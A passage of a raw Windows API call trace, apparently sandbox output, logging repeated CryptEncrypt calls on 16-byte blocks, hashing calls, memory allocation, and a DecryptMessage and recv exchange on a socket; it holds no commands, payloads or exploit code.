pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.532] malloc (_Size=0x1fd) returned 0x3def010 [0157.532] free (_Block=0x0) [0157.532] free (_Block=0x3d81e60) [0157.533] free (_Block=0x606108) [0157.533] malloc (_Size=0x1fd) returned 0x606108 [0157.533] free (_Block=0x0) [0157.533] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.533] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.533] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.533] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.533] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.533] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.533] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.533] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.533] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.533] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.533] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.533] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.534] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.535] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.535] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.535] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.535] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.535] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.535] free (_Block=0x0) [0157.535] free (_Block=0x3def010) [0157.535] malloc (_Size=0x1fd) returned 0x3def010 [0157.535] free (_Block=0x0) [0157.535] CryptDuplicateHash (in: hHash=0x432c78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0157.535] CryptHashData (hHash=0x432938, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.535] malloc (_Size=0x14) returned 0x3f65340 [0157.535] free (_Block=0x0) [0157.535] CryptGetHashParam (in: hHash=0x432938, dwParam=0x2, pbData=0x3f65340, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f65340, pdwDataLen=0x339faec) returned 1 [0157.535] CryptHashData (hHash=0x432c78, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.535] free (_Block=0x3f65340) [0157.535] CryptDestroyHash (hHash=0x432938) returned 1 [0157.535] free (_Block=0x3def010) [0157.536] free (_Block=0x606108) [0157.536] malloc (_Size=0x1fd) returned 0x606108 [0157.536] free (_Block=0x0) [0157.536] malloc (_Size=0x1c5) returned 0x3def010 [0157.536] free (_Block=0x0) [0157.536] malloc (_Size=0x1c5) returned 0x3def1e0 [0157.536] free (_Block=0x0) [0157.536] free (_Block=0x0) [0157.536] free (_Block=0x3def010) [0157.536] free (_Block=0x3def1e0) [0157.536] free (_Block=0x606108) [0157.536] free (_Block=0x3d81e60) [0157.536] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0157.537] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0157.688] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0157.688] malloc (_Size=0x1fd) returned 0x606108 [0157.688] free (_Block=0x0) [0157.688] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.688] free (_Block=0x0) [0157.688] free (_Block=0x0) [0157.688] free (_Block=0x606108) [0157.688] malloc (_Size=0x1fd) returned 0x606108 [0157.688] free (_Block=0x0) [0157.689] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.689] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.689] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.689] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.689] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.689] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.689] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.689] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.689] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.689] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.689] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.689] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.690] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.690] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.690] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.690] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.690] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.690] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.690] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.690] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.690] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.690] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.690] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.690] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.691] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.691] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.691] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.691] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.691] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.691] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.691] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.691] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.691] malloc (_Size=0x1fd) returned 0x3def010 [0157.691] free (_Block=0x0) [0157.691] free (_Block=0x3d81e60) [0157.691] free (_Block=0x606108) [0157.691] malloc (_Size=0x1fd) returned 0x606108 [0157.692] free (_Block=0x0) [0157.692] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.692] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.692] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.692] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.692] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.692] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.692] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.692] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.692] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.692] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.692] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.692] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.693] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.693] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.693] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.693] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.693] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.693] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.693] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.693] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.693] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.693] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.693] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.693] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.693] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, 